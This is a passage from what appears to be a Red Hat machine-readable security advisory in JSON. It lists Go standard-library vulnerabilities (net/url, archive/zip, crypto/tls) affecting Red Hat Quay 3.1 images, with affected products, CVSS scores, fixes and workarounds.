"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
